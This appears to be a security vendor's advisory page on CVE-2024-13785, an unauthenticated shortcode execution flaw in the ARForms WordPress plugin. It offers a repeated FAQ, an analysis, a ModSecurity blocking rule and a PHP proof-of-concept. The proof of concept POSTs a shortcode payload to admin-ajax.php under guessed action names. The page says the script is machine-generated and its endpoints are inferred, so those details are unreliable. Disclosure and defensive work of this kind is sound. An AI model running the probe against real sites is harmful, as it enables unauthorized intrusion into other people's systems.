What is CVE -2024-13785?

CVE-2024-13785 is a medium severity vulnerability in the ARForms plugin for WordPress, allowing unauthenticated attackers to execute arbitrary shortcodes. This occurs due to improper validation of user input before it is passed to the do_shortcode function.

Who is affected by this vulnerability?

Any WordPress site using ARForms plugin version 1.7.2 or earlier is affected by this vulnerability. Administrators should check their plugin version in the WordPress dashboard under Plugins.

How does the vulnerability work?

The vulnerability allows attackers to send a specially crafted AJAX request to the WordPress site, triggering the execution of arbitrary shortcodes. This is possible because the plugin does not properly sanitize user input.

What are the potential impacts of exploitation?

Successful exploitation can lead to unauthorized actions such as data exposure, privilege escalation, or site compromise, depending on the shortcodes available on the target site.

What does the CVSS score of 5.6 indicate?

A CVSS score of 5.6 signifies a medium risk level, indicating that while the complexity of the attack is high, the potential impact on confidentiality, integrity, and availability is low.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ARForms plugin. If it is version 1.7.2 or earlier, your site is at risk. Additionally, you can review server logs for suspicious AJAX requests.

What steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the ARForms plugin to the latest version. Additionally, implement input validation and sanitization in any custom code that interacts with the plugin.

What is the proof of concept for this vulnerability?

The proof of concept illustrates how an attacker can send a POST request to the admin-ajax.php endpoint with a malicious shortcode payload. This demonstrates the lack of input validation leading to arbitrary shortcode execution.

How can I secure my WordPress site against such vulnerabilities?

To secure your WordPress site, regularly update all plugins and themes, use security plugins, and perform regular security audits. Additionally, implement proper user role management and restrict access to sensitive areas.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the ARForms plugin until a patch is applied. Also, review and restrict access to AJAX endpoints if feasible.

Are there any known exploits for this vulnerability?

As of now, there are no widely reported exploits in the wild for CVE-2024-13785, but the nature of the vulnerability makes it a potential target for attackers.

Where can I find more information about this vulnerability?

More information about CVE-2024-13785 can be found on the official CVE database, security advisories from WordPress, and plugin-specific documentation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2024-13785: Contact Form, Survey, Quiz & Popup Form Builder – ARForms <= 1.7.2 – Unauthenticated Blind Arbitrary Shortcode Execution (arforms-form-builder)

CVE ID CVE-2024-13785

Plugin arforms-form-builder

Severity Medium (CVSS 5.6)

CWE 94

Vulnerable Version 1.7.2

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13785 (metadata-based):
This vulnerability in the ARForms plugin (versions <=1.7.2) allows unauthenticated attackers to execute arbitrary WordPress shortcodes. The flaw resides in an AJAX or form handler that passes unsanitized user input directly to the `do_shortcode()` function. The CVSS score of 5.6 (Medium) reflects an attack requiring high complexity but with low impact on confidentiality, integrity, and availability.

Atomic Edge research identifies the root cause as CWE-94, Improper Control of Generation of Code. The vulnerability description confirms the software allows users to execute an action that does not properly validate a value before running `do_shortcode`. This is a classic code injection flaw where user-supplied data is interpreted as executable shortcode. Without a code diff, this conclusion is inferred from the CWE classification and the explicit mention of `do_shortcode` in the description. The lack of authentication and validation checks is a direct failure of the plugin's security controls.

Exploitation likely occurs via a WordPress AJAX endpoint accessible to unauthenticated users. The standard pattern is a `wp_ajax_nopriv_{action}` hook. Attackers would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter containing a value like `arforms_{specific_action}`. A second parameter, perhaps named `shortcode` or `content`, would contain the malicious shortcode payload. For example, an attacker could inject `[shortcode arg="malicious_value"]` to trigger other plugins' functionalities, potentially leading to data exposure or further exploitation.

Effective remediation requires validating and sanitizing the user input before passing it to `do_shortcode()`. The plugin should implement a strict allowlist of permissible shortcodes or tags. The fix must also include a capability check to ensure only authorized users can trigger the relevant action. Patching this vulnerability involves modifying the callback function for the implicated AJAX hook to include these security measures.

Successful exploitation allows arbitrary shortcode execution. While shortcodes themselves are not PHP code, they can trigger significant side effects. Attackers could use shortcodes from other installed plugins or themes to read sensitive data, create administrative users, or perform reflected cross-site scripting. The impact is limited by the available shortcodes on the target site, but in a multi-plugin environment, this can lead to privilege escalation, data leakage, or site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13785 (metadata-based)
# This rule blocks exploitation of the unauthenticated shortcode execution vulnerability.
# It targets POST requests to the WordPress AJAX handler with an action parameter
# matching the ARForms plugin pattern and containing a shortcode pattern in a likely parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202413785,phase:2,deny,status:403,chain,msg:'CVE-2024-13785: ARForms Unauthenticated Shortcode Execution Attempt',severity:'CRITICAL',tag:'CVE-2024-13785',tag:'WordPress',tag:'Plugin',tag:'ARForms'"
  SecRule ARGS_POST:action "@rx ^arforms_(execute_shortcode|ajax_action|process_form|preview|.*)" "chain"
    SecRule ARGS_POST:/^(shortcode|content|value|data)$/ "@rx \[.*\]"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13785 - Contact Form, Survey, Quiz & Popup Form Builder – ARForms <= 1.7.2 - Unauthenticated Blind Arbitrary Shortcode Execution
<?php
/**
 * Proof of Concept for CVE-2024-13785.
 * This script attempts to exploit the unauthenticated shortcode execution vulnerability.
 * The exact AJAX action and parameter names are inferred from common plugin patterns.
 * Assumptions:
 *   1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
 *   2. The action hook is related to the plugin slug 'arforms'.
 *   3. A user-controlled parameter is passed to do_shortcode().
 */

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common inferred action names for the ARForms plugin
$possible_actions = [
    'arforms_execute_shortcode',
    'arforms_ajax_action',
    'arforms_process_form',
    'arforms_preview'
];

// A shortcode payload that, if executed, would reveal the WordPress site title.
// This is a common, low-impact shortcode for proof-of-concept testing.
$shortcode_payload = '[bloginfo key="name"]';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($possible_actions as $action) {
    // Try different common parameter names that might hold the shortcode
    $post_fields = [
        'action' => $action,
        'shortcode' => $shortcode_payload,
        'content' => $shortcode_payload,
        'value' => $shortcode_payload,
        'data' => $shortcode_payload
    ];
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] Potential success with action: {$action}n";
        echo "    HTTP Code: {$http_code}n";
        echo "    Response (first 500 chars): " . substr($response, 0, 500) . "nn";
        // If the site title appears in the response, the shortcode was executed.
        if (stripos($response, 'Example') !== false || stripos($response, 'Just another') !== false) {
            echo "[!] CONFIRMED: Shortcode execution likely successful.n";
        }
    } else {
        echo "[-] No success with action: {$action} (HTTP {$http_code})n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2024-13785?
Overview of the vulnerability
CVE-2024-13785 is a medium severity vulnerability in the ARForms plugin for WordPress, allowing unauthenticated attackers to execute arbitrary shortcodes. This occurs due to improper validation of user input before it is passed to the do_shortcode function.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using ARForms plugin version 1.7.2 or earlier is affected by this vulnerability. Administrators should check their plugin version in the WordPress dashboard under Plugins.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a specially crafted AJAX request to the WordPress site, triggering the execution of arbitrary shortcodes. This is possible because the plugin does not properly sanitize user input.
What are the potential impacts of exploitation?
Consequences of successful attacks
Successful exploitation can lead to unauthorized actions such as data exposure, privilege escalation, or site compromise, depending on the shortcodes available on the target site.
What does the CVSS score of 5.6 indicate?
Understanding the severity rating
A CVSS score of 5.6 signifies a medium risk level, indicating that while the complexity of the attack is high, the potential impact on confidentiality, integrity, and availability is low.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the ARForms plugin. If it is version 1.7.2 or earlier, your site is at risk. Additionally, you can review server logs for suspicious AJAX requests.
What steps should I take to mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the ARForms plugin to the latest version. Additionally, implement input validation and sanitization in any custom code that interacts with the plugin.
What is the proof of concept for this vulnerability?
Demonstration of the issue
The proof of concept illustrates how an attacker can send a POST request to the admin-ajax.php endpoint with a malicious shortcode payload. This demonstrates the lack of input validation leading to arbitrary shortcode execution.
How can I secure my WordPress site against such vulnerabilities?
Best practices for security
To secure your WordPress site, regularly update all plugins and themes, use security plugins, and perform regular security audits. Additionally, implement proper user role management and restrict access to sensitive areas.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the ARForms plugin until a patch is applied. Also, review and restrict access to AJAX endpoints if feasible.
Are there any known exploits for this vulnerability?
Current threat landscape
As of now, there are no widely reported exploits in the wild for CVE-2024-13785, but the nature of the vulnerability makes it a potential target for attackers.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2024-13785 can be found on the official CVE database, security advisories from WordPress, and plugin-specific documentation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations